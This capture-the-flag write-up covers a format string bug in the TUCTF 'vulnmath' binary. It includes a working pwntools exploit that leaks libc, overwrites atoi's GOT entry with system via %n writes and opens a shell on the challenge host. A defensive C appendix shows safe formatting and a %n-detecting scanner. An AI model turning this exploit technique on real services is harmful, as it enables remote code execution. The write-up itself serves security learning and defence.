#### Given the binary, with details like this below
```
chao at Yu in [~/Documents/WriteUps/TUCTF/pwn/vulnmath] on git:master ✔︎ 7e4a166 "Added so many new pwn"
16:53:27 › file vulnmath && checksec vulnmath
vulnmath: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, BuildID[sha1]=ba48ed39bdaaa3ddfc1bab6e8f45c8ee92e552bc, for GNU/Linux 3.2.0, not stripped
[*] Checking for new versions of pwntools
To disable this functionality, set the contents of /home/chao/.pwntools-cache/update to 'never'.
[*] You have the latest version of Pwntools (3.13.0)
[*] '/home/chao/Documents/WriteUps/TUCTF/pwn/vulnmath/vulnmath'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
```
After some research, we knew that this binary has a format string bug.
It has no canary and no PIE, but NX is enabled. Since RELRO is only partial, the GOT is still writable, so the idea is to overwrite the **GOT entry** of **atoi** with the address of **system**.
First, we find the index where we can overwrite. We found it at index 7.
To overwrite **atoi** with **system**, we first need to leak libc. We found a libc leak of **__libc_start_main_ret** at index 23.
Then, for the **GOT overwrite**, we wrote this exploit:
```python
from pwn import *
import sys
from time import sleep


def exploit(p, libc_diff, libc):
    binary = ELF("vulnmath")

    # Leak the __libc_start_main return address sitting at stack index 23.
    payload = ''
    payload += '%23$p'
    p.sendline(payload)
    p.recvuntil("Incorrect!\n")
    libc_leak = int(p.recvline()[:-1], 16)
    log.info("Libc Diff : {}".format(hex(libc_diff)))
    log.info("__Libc_start_main: {}".format(hex(libc_leak)))

    # Rebase libc from the leak, then resolve system and atoi@got.
    libc.address = libc_leak - libc_diff
    log.info("Libc base : {}".format(hex(libc.address)))
    libc_system = libc.symbols['system']
    log.info("Libc system : {}".format(hex(libc_system)))
    atoi_got = binary.symbols["got.atoi"]
    log.info("atoi@got: {}".format(hex(atoi_got)))

    # Split system's address into its low and high 16-bit halves; each half
    # is written separately with %n.
    overwrite = str(hex(libc_system))[2:]
    first_overwrite = int(overwrite[4:], 16)   # low half
    log.info("First overwrite: {} or in hex {}".format(first_overwrite, hex(first_overwrite)))
    second_overwrite = int(overwrite[:4], 16)  # high half
    log.info("Second overwrite: {} or in hex {}".format(second_overwrite, hex(second_overwrite)))

    # The two target addresses land at indices 6 and 7; the padded %p
    # conversions bring the printed byte count up to each half before the %n.
    payload = ""
    payload += p32(atoi_got)
    payload += p32(atoi_got + 2)
    payload += "%6${}p".format(first_overwrite - len(payload))
    payload += "%6$n"
    payload += "%{}p".format(second_overwrite - first_overwrite)
    payload += "%7$n"
    # gdb.attach(p, """
    # brva *0x08049446
    # brva *0x0804944c
    # c
    # """)
    p.sendline(payload)
    sleep(1)
    # atoi@got now points at system, so the next input is passed to it.
    p.sendline("/bin/sh\x00")
    p.sendline("ls -la && cat f*")
    p.interactive()


if __name__ == "__main__":
    if len(sys.argv) < 2:
        log.info("Argument needed!")
        log.info("Usage: python {} <local/remote>".format(sys.argv[0]))
        sys.exit(0)
    elif sys.argv[1] == "local":
        p = process("./vulnmath")
        libc = ELF("libc6_2.27-3ubuntu1_i386.so")
        exploit(p, libc.symbols["__libc_start_main"] + 241, libc)
    elif sys.argv[1] == "remote":
        p = remote("chal.tuctf.com", 30502)
        libc = ELF("libc.so.6")
        exploit(p, libc.symbols["__libc_start_main"] + 249, libc)
    else:
        sys.exit(0)
```
Then run the exploit; we should get the shell:
```
> > $ id
uid=1000(chao) gid=1000(chao) groups=1000(chao),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),999(docker)
```
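From the defensive side, here is an added example (not part of the original writeup and not the challenge's source): the hardened way to echo untrusted input, next to a scanner that flags the directive patterns used above (`%23$p`, `%6$n`) in a string before it could ever reach a format argument. `echo_safe`, `count_format_directives` and `contains_write_directive` are names I chose; the sample inputs are constructed.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Hardened form: untrusted input is an argument, never the format string.
   The bug above is the printf(buf) pattern; gcc's -Wformat -Werror=format-security
   rejects that at compile time, and linking with -Wl,-z,relro,-z,now (Full RELRO)
   makes atoi@got read-only, so the overwrite would fault instead of succeeding. */
int echo_safe(char *out, size_t out_len, const char *untrusted) {
    return snprintf(out, out_len, "%s", untrusted);
}

/* Walks a string the way printf would, counting conversion directives.
   Handles "%%" as a literal, positional "%23$p", flags/width such as
   "%6$53760p", and length modifiers. Sets *writes if any %n is present. */
static int scan_directives(const char *s, int *writes) {
    int n = 0;
    *writes = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                 /* "%%": literal percent */
        /* positional index, flags, width, precision */
        while (*p && (isdigit((unsigned char)*p) || strchr("$-+ #.*", *p))) p++;
        while (*p && strchr("hlLqjzt", *p)) p++; /* length modifiers */
        if (!*p) break;                          /* dangling '%' at end */
        if (*p == 'n') *writes = 1;              /* the write primitive */
        n++;
    }
    return n;
}

/* Number of directives that would consume arguments (leak/read). */
int count_format_directives(const char *s) {
    int writes;
    return scan_directives(s, &writes);
}

/* 1 if the string carries a %n, i.e. would write memory as a format string. */
int contains_write_directive(const char *s) {
    int writes;
    scan_directives(s, &writes);
    return writes;
}

static char g_out[64];  /* scratch buffer for echo_safe demos */
```

A service that logs or rejects inputs where `contains_write_directive` is set, and that only ever formats with `echo_safe`, keeps both the leak at index 23 and the `%n` write out of reach.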